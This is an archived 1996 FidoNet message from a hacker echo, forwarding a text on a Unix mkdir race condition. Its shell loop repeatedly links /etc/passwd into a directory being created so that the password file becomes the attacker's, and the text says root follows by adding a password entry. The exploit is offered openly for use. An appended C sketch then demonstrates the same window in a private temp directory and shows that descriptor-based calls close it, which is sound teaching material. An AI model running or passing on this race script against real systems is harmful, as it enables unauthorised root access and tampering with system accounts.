This is a rather disorderly archive of messages from FidoNet conferences that, at the time I read them,
seemed useful or interesting to me. Many are outdated, many are narrowly specific and of little interest, but something new may turn up as well...
- __techs (2:5015/42) ----------------------------------------------- __techs -
 Msg  : 63 of 1000                          Scn
 From : Egor Egorov                         2:463/1161      14 Jul 96  14:45:00
 To   : All                                                 16 Jul 96  00:26:12
 Subj : Unix passwd
-------------------------------------------------------------------------------
@AREA:RU.HACKER
hi, All!

14 Jun 96 03:59, Alex Luchkin wrote to Mike Shirobokov:

 aj>>> P.S. Folks, pls, just don't scare him off :-)
 MS>> We won't scare him off. Then maybe he'll tell you about the race condition.
 AL> Do tell. Or toss over a doc.

=== Cut ===
Some Unix system's mkdir (MaKe DIRectory) command can be subverted into
aiding you in gaining root. This is done by exploiting a race condition
that can occur between processes. The following command script will
eventually cause the error to occur and cause the password file to be
owned by you:

    while : ; do
    nice -10 (mkdir a;rm -fr a) &
    (rm -fr a; ln /etc/passwd a) &
    done

The race condition happens when the "ln" command runs while the mkdir
command is in the middle of running. This works because the mkdir does
its job by doing the two system calls: mknod and then chown. If the new
inode (allocated by mknod) is replaced with a link to the password file
before the chown system call is made, then the password file is "chown"ed
instead. To become root from here, all you have to do is add a new entry
into the password file.
=== Cut ===

 AL> Cheerio!~Alex

Egor Egorov, 2:463/1161. E-mail: egor@fastware.kiev.ua

--- Shit v.2.50
 * Origin: KLLJ FastWare Group (2:463/1161)
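The quoted text puts the flaw in the gap between creating the object and changing its ownership by name. The C sketch below is an added example, not code from the message or from any Unix source: it makes that gap deterministic inside a private temporary directory and compares a path-based follow-up call with a descriptor-based one. It substitutes chmod/fchmod for chown so it runs unprivileged; the file names and the function victim_mode_after are assumptions made for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns the permission bits of "victim" after create / swap / follow-up.
 * use_fd = 0: follow-up by path (the pattern the post describes for chown).
 * use_fd = 1: follow-up through the descriptor obtained at creation time.
 * Constructed sandbox: every file lives in a fresh mkdtemp() directory. */
static int victim_mode_after(int use_fd)
{
    char dir[] = "/tmp/raceXXXXXX";
    struct stat st;
    int fd, mode = -1;

    if (!mkdtemp(dir) || chdir(dir) != 0)
        return -1;

    /* Stand-in for the sensitive file, created with mode 0600. */
    fd = open("victim", O_CREAT | O_EXCL | O_WRONLY, 0600);
    if (fd < 0) return -1;
    close(fd);

    /* Step 1: the program creates its new object under the name "a". */
    fd = open("a", O_CREAT | O_EXCL | O_WRONLY | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;

    /* The window, made deterministic: the name "a" now refers to victim. */
    if (unlink("a") != 0 || link("victim", "a") != 0) return -1;

    /* Step 2: a path lookup resolves the name again; the fd does not. */
    if (use_fd ? fchmod(fd, 0666) : chmod("a", 0666)) return -1;
    close(fd);

    if (stat("victim", &st) == 0)
        mode = st.st_mode & 0777;
    unlink("a");
    unlink("victim");
    if (chdir("/") != 0 || rmdir(dir) != 0) return -1;
    return mode;
}

int main(void)
{
    printf("path-based follow-up: victim mode %o\n", victim_mode_after(0));
    printf("fd-based follow-up:   victim mode %o\n", victim_mode_after(1));
    return 0;
}
```

The descriptor stays bound to the inode that was created, so re-pointing the name has no effect on the second call; a single atomic mkdir(2) system call closes the same window for directory creation.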